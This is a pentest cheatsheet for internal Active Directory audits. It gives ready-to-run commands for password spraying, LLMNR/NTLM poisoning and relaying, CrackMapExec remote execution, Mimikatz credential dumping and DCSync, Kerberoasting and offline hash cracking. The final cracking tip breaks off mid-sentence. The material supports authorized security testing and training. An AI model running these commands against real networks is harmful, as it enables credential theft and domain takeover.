cheatsheets/cheatsheets/security/windows/internal-audits/internal-audit.md

---

title: Internal Network Audit categories: [cheatsheets]

tags: [windows, security, network, AD]

Internal Network Audit

ToC

• Low Hanging Fruits
  • AD Enumeration
  • Password spraying
  • Bloodhound
• More Advanced Attacks
  • Kerberoasting
  • AS-REP Roast
  • NTLM relaying attack

Low Hanging Fruits

AD Enumeration

• Get domain password policy

  net accounts /domain
  

• use PowerView to list domain users with more information

  • https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
  • Admin Account Flag
  • lastlogon
  • badpwdcount
  • pwdlastset
  • description (sometimes used to store passwords)

• Get accountname & descriptions (can store interesting information)

  Get-DomainUser | Select-Object -Property samaccountname,description
  

• Get Accounts sorted by pwdlastset

  Get-DomainUser -Property samaccountname,pwdLastSet | where {$_.samaccountname -ne 'DefaultAccount' -AND $_.samaccountname -ne 'Guest'} | sort pwdLastSet | ft -wrap -autosize
  

Password Spraying via Kerberos

• using the Tool kerbrute by ropnop
  • https://github.com/ropnop/kerberos_windows_scripts
  • https://github.com/ropnop/kerbrute
• uses kerberos preauthentication
• only 2 UDP frames
• no logon failure event (4625)

• Important: note how many password trys are possible before locking an account

  kerbrute passwordspray -d <domain> users.txt Summer2019!
  

Bloodhound

• Bloodhound Ingestors can be used to enumerate domain specific information from the DC
• Ingestors:
  • PS (default ingestor)
  • python (pip install bloodhound)
  • C# (Sharphound)

• can be executed from domain-joined and non-domain-joined computers.

• With the python ingestor

  # Domain-joined host, working DNS
  bloodhound-python -u user@DOMAIN -p PASSWORD
  
  # Non-Domain-Joined Hosts / DNS troubles
  bloodhound-python -u user@DOMAIN -p PASSWORD  -d DOMAIN -dc DC1.DOMAIN.COM -gc DC1.DOMAIN.COM
  

• SharpHound

  # get all information from the DC
  SharpHound.exe -c All
  # connects to any computer in the AD for 24h to get session information
  SharpHound.exe -c SessionLoop --MaxLoopTime 24h
  

Local AD Accounts

• check the local Serviec account if any AD account is used
• open Services and sort by "Log On As"
• -> Find AD Accounts
• Mimikatz to get the (cleartext) password

Responder Action - Attacks against the NTLM authentication protocol

• https://github.com/lgandx/Responder
• Responder is able to capture LLMNR & NetBios broadcast requests to capture NetNTLM hashes on the network
• NetNTLM can be bruteforced (very slow, only possible with bad password policy)

• NTLM relaying (see below)

  sh> responder.py -c config -I eth0
  

• what triggers LLMNR, NetBios and WPAD broadcasts?

  • If a domain cannot be resolved by DNS (wont work in new browsers)
  • Set DNS entries as unprivileged users
  • if IPv6 is not configured, it overrules IPv4 (Tool: MITM6)

mitm6

• Code: https://github.com/fox-it/mitm6
• Windows (since Windows Vista) prefers IPv6 over IPv4
• If IPv6 is not configured, an attacker can abuse this preference by acting as malicious DNS server - answers all DHCPv6 messages to setup a IPv6 ip as new DNS server on the victim machine.
• Works perfect in combination with WPAD and NTLM relaying attacks
• Details: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/

DC Sync

• Account with the rights "GenericAll" needed
• Can be used for a dcsync attack with mimikatz (lsadump::dcsync /domain:<domain> /all /csv)
• -> This gets every NTLM hash from the DC
• -> krbtgt hash can be used to create golden tickets

Attacking SMB

• Tool: CrackMapExec https://github.com/byt3bl33d3r/CrackMapExec
• Detailed Wiki Page:
  • https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference
• -p <password> can be replaced with -H <hash> for PtH Attacks
• CME will print (pwn3d) once a user has write access to C$ or ADMIN$

• Enumerating SMB shares and saving ips where SMB signing is disabled

  sh> cme smb <cidr> --gen-relay-list targets.txt
  
  SMB         192.168.1.101    445    DC2012A          [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012A) (domain:OCEAN) (signing:True) (SMBv1:True)
  SMB         192.168.1.102    445    DC2012B          [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012B) (domain:EARTH) (signing:True) (SMBv1:True)
  SMB         192.168.1.111    445    SERVER1          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:SERVER1) (domain:PACIFIC) (signing:False) (SMBv1:True)
  SMB         192.168.1.117    445    WIN10DESK1       [*] WIN10DESK1 x64 (name:WIN10DESK1) (domain:OCEAN) (signing:False) (SMBv1:True)
  

• Enumerating all shares

  sh> cme smb ips.txt -u <user> -p <pass> --shares
  

• Code Execution (write access to C$ or ADMIN$ is needed)

  sh> cme smb ips.txt -u <user> -p <pass> -[xX] 'whoami'
  

• Dumping Secrets (write access to C$ or ADMIN$ is needed)

  sh> cme smb ips.txt -u <user> -p <pass> --[sam/lsa]
  

Mimikatz

• Dropping logonpasswords

  mimikatz "privilege::debug" "sekurlsa::logonpasswords"
  

• DCSync (requires GenericAll permissions)

  lsadump::dcsync /domain:<domain> /all /csv
  

Tipps: GenericAll

• Access without changing the password of another user:
  • Logon Script
  • Kerberoasting
  • AS-REP Roast
  • DC Sync + DC Shadow to reset old password

More Advanced Attacks

Kerberoasting

Background (Kerberos TGT and TGS)

1. A attacker authenticates to a domain and gets a ticket-granting-ticket (TGT) from the domain controller that’s used for later ticket requests.
2. The attacker uses their TGT to issue a service ticket request (TGS-REQ) for a particular servicePrincipalName (SPN) of the form sname/host, e.g. MSSqlSvc/SQL.domain.com. This SPN should be unique in the domain, and is registered in the servicePrincipalName field of a user or computer account. During this request process, the attacker can specify what Kerberos encryption types they support (RC4_HMAC, AES256_CTS_HMAC_SHA1_96, etc).
3. If the attacker’s TGT is valid, the DC extracts information from the TGT stuffs it into a service ticket. Then the domain controller looks up which account has the requested SPN registered in its servicePrincipalName field. The service ticket is encrypted with the hash of the account with the requested SPN registered, using the highest level encryption key that both the attacker and the service account support. The ticket is sent back to the attacker in a service ticket reply (TGS-REP).
4. The attacker extracts the encrypted service ticket from the TGS-REP. Since the service ticket was encrypted with the hash of the account linked to the requested SPN, the attacker can crack this encrypted blob offline to recover the account’s plaintext password.

Attack

There are two common approaches:

1) From an Domain-Joined Windows host:

• Get all possible SPN's with PowerViews Get-DomainUser function:

  PS> Get-DomainUser -SPN
  

• For all possible SPN's request tickets with powershell and extract them from memory with mimikatz:

  PS C:\> Add-Type -AssemblyName System.IdentityModel
  PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"
  PS C:\> klist
  <tickets>
  

• Extract with Mimikatz:

  mimikatz # kerberos::list /export
  

2) Using a custom implementation of the kerberos protocol

This can be done with impackets GetUserSPNs.py tool:

sh> GetUserSPNs.py -request -dc-ip <domain-controller-ip> <domain/user>

3) PowerViews Invoke-Kerberoast

This modules does everything automated and outputs the hashes fitting for john the ripper and hashcat:

PS> Invoke-Kerberoast

The hashes can then be cracked with john the ripper, hashcat, or tgsrepcrack.

If the hashes were extracted with mimikatz, the '*.kirbi' files can be converted to john/hashcat compatible hashes with the tool kirbi2john.

• With john:

  sh> john hashes.txt
  

• With hashcat

  sh> hashcat -m 13100 -a 0 hashes.txt /path/to/wordlist.txt
  

References:

• https://github.com/nidem/kerberoast
• https://www.harmj0y.net/blog/redteaming/kerberoasting-revisited/

AS-REP Roast

If user-accounts in the AD dont have the DONT_REQ_OREAUTH set, aka dont require kerberos preauthentication, a piece of encrypted information can be requested that can be used to offline bruteforce the password of this user account.

To find such user accounts, the following PowerView command can be used:

PS> Get-DomainUser -PreauthNotRequired

References:

• https://www.harmj0y.net/\blog/activedirectory/roasting-as-reps/
• https://github.com/HarmJ0y/ASREPRoast

NTLM relaying attack

• Creating a list of potential targets with crackmapexec

  sh> cme smb computers.txt --gen-relay-list targets.txt
  

• Start responder (with the HTTP & SMB server turned off):

  sh> python Responder.py -I <interface> -r -d -w
  

• Start the NTLM relaying with ntlmrelayx.py using the targets from above:

  sh> ntlmrelayx.py -tf targets.txt
  

• This can also be used to execute an custom executable (e.g. empire launcher):

  sh> ntlmrelayx.py -tf targets.txt -c <insert your Empire Powershell launcher here>
  

Password Cracking

• https://tools.kali.org/password-attacks/cewl
• https://github.com/NotSoSecure/password_cracking_rules

Rule:

Then save the first, lastname of the user accounts and full name.. use sed also to capitalize the first letter and use those.. then run with -a 6 with ur wordlist.txt adding custom-charset1=!@$#% and brute wit>

References:

• https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html